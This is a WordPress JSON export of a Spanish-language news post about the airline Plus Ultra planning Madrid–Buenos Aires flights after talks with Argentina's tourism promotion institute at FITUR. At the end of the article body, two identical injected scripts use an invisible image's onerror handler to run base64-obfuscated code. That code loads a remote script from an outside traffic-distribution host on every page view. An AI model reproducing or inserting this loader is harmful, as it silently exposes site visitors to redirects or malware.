{"id":2112,"date":"2023-01-20T13:35:29","date_gmt":"2023-01-20T16:35:29","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2112"},"modified":"2025-08-14T00:25:03","modified_gmt":"2025-08-14T03:25:03","slug":"la-aerolinea-plus-ultra-proyecta-volar-entre-madrid-y-buenos-aires","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2112","title":{"rendered":"LA AEROL\u00cdNEA PLUS ULTRA PROYECTA VOLAR ENTRE MADRID Y BUENOS AIRES"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#022133\"><em>As\u00ed lo confirm\u00f3 Gibson Preziuso, Director de Marketing de la compa\u00f1\u00eda a\u00e9rea espa\u00f1ola durante la feria FITUR en Madrid.<\/em><\/h4>\n\n\n\n<p>Durante la feria m\u00e1s importante de Europa,&nbsp;<strong>FITUR<\/strong>, el&nbsp;<strong>Instituto Nacional de Promoci\u00f3n Tur\u00edstica,<\/strong>&nbsp;encabezado por&nbsp;<strong>Ricardo Sosa&nbsp;<\/strong>y la aerol\u00ednea&nbsp;<strong>Plus Ultra&nbsp;<\/strong>se reunieron con el objetivo de trabajar en conjunto&nbsp;<strong>para lograr que la aerol\u00ednea espa\u00f1ola pueda volar a la Argentina<\/strong>.<\/p>\n\n\n\n<p>El&nbsp;<strong>Director de Marketing de Plus Ultra, Gibson Preziuso<\/strong>&nbsp;expres\u00f3 el inter\u00e9s por volar a la Argentina: \u201cE<em>stamos consolidando las rutas que tenemos este a\u00f1o, y seguramente para el 2024 estaremos con los proyectos de nuevas rutas y Argentina estar\u00e1 en ese proyecto<\/em>\u201d.<\/p>\n\n\n\n<p>Por su parte, el&nbsp;<strong>Secretario Ejecutivo del INPROTUR, Ricardo Sosa<\/strong>&nbsp;declar\u00f3: \u201c<em>La posibilidad de tener una nueva aerol\u00ednea que lleguen a nuestro pa\u00eds, es fruto del trabajo y de las reuniones generadas durante FITUR. Es importante continuar las conversaciones con las distintas \u00e1reas para que esto se haga realidad. Para el crecimiento del turismo receptivo es fundamental tener m\u00e1s asientos y aerol\u00edneas que vengan a nuestro pa\u00eds. En reuniones de la feria de turismo en Anato logramos que Viva Air viaje a la Argentina y ahora buscamos m\u00e1s como Plus Ultra<\/em>\u201d.<\/p>\n\n\n\n<p>Adem\u00e1s,&nbsp;<strong>Sosa<\/strong>&nbsp;Agreg\u00f3: \u201c<em>De esta manera se busca incrementar la oferta a\u00e9rea entre Espa\u00f1a y Argentina. Durante 2022, arribaron a la Argentina 137 mil turistas espa\u00f1oles, lo que significa un casi un 70% de recuperaci\u00f3n con los niveles de la prepandemia. Somos optimistas de lograr un crecimiento este 2023 del turismo receptivo y por eso estamos en FITUR reuni\u00e9ndonos con aerol\u00edneas y teniendo importantes acuerdos y avances para la promoci\u00f3n y el aumento de conectividad<\/em>\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci5.googleusercontent.com\/proxy\/lmcMzluSEyPsC2wyl-JNrYukFGZMeAVM6XhkGw81W0S5X4OpXgbP9dTV_qEexJuUKTYHQNe11v_YZyDJcz5G-8A1Qr-uLWhaf0zh7zWLcalE4HUAkEOLFVbbT6qJd6CbMuyuxJ4taDOsxMNL1RVk-NQBBdVNqoU=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/80ca00b3-e99c-453c-1dc7-4c04977cdbc2.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Preziuso tambi\u00e9n se\u00f1al\u00f3: \u201c<em>Argentina es un pa\u00eds sumamente importante. Es una de las econom\u00edas m\u00e1s fuertes de Am\u00e9rica Latina y existe un tr\u00e1fico importante de argentinos en Europa y sabemos que hay muchos espa\u00f1oles que est\u00e1n locos por conocer las bondades tur\u00edsticas del pa\u00eds, de ir a El Calafate, a Bariloche, a Iguaz\u00fa y conocer el turismo gastron\u00f3mico. Adem\u00e1s, hay un tr\u00e1fico corporativo importante<\/em>\u201d. El&nbsp;<strong>director de marketing de Plus Ultra&nbsp;<\/strong>agreg\u00f3: \u201c<em>Logramos captar el tr\u00e1fico de turismo hacia la Argentina. Estamos ciertamente analizando en volar a la Argentina. Existen algunas quintas libertades, garantizadas por los acuerdos bilaterales entre la Uni\u00f3n Europea y Espa\u00f1a y entre Brasil y Argentina que podr\u00eda ser interesante para nosotros y para todo el turismo de Argentina<\/em>\u201d.<\/p>\n\n\n\n<p>En la reuni\u00f3n, adem\u00e1s de&nbsp;<strong>Sosa y Preziuso<\/strong>, estuvieron presentes el Director Comercial de Plus Ultra, David Blazquez y el Asesor Comercial del INPROTUR, Hugo D\u00edaz.<\/p>\n\n\n\n<p><strong>Plus Ultra<\/strong>&nbsp;fue fundada en 2011 y tiene una flota de<strong>&nbsp;6 aviones Airbus 330 y 1 avi\u00f3n Airbus 340<\/strong>&nbsp;y tendr\u00e1 en unos meses dos aviones m\u00e1s. La aerol\u00ednea tiene su hub en Madrid y vuela hacia Bogot\u00e1, Caracas, Cartagena de Indias, Lima, Malabo y Tenerife actualmente.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>As\u00ed lo confirm\u00f3 Gibson Preziuso, Director de Marketing de la compa\u00f1\u00eda a\u00e9rea espa\u00f1ola durante la feria FITUR en Madrid. Durante la feria m\u00e1s importante de Europa,&nbsp;FITUR, el&nbsp;Instituto Nacional de Promoci\u00f3n Tur\u00edstica,&nbsp;encabezado por&nbsp;Ricardo Sosa&nbsp;y la aerol\u00ednea&nbsp;Plus Ultra&nbsp;se reunieron con el objetivo de trabajar en conjunto&nbsp;para lograr que la aerol\u00ednea espa\u00f1ola pueda volar a la Argentina. El&nbsp;Director [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2113,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[20,18],"tags":[],"class_list":{"0":"post-2112","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-empresas","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2112"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2112"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2112\/revisions"}],"predecessor-version":[{"id":7201,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2112\/revisions\/7201"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2113"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2112"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2112"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2112"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}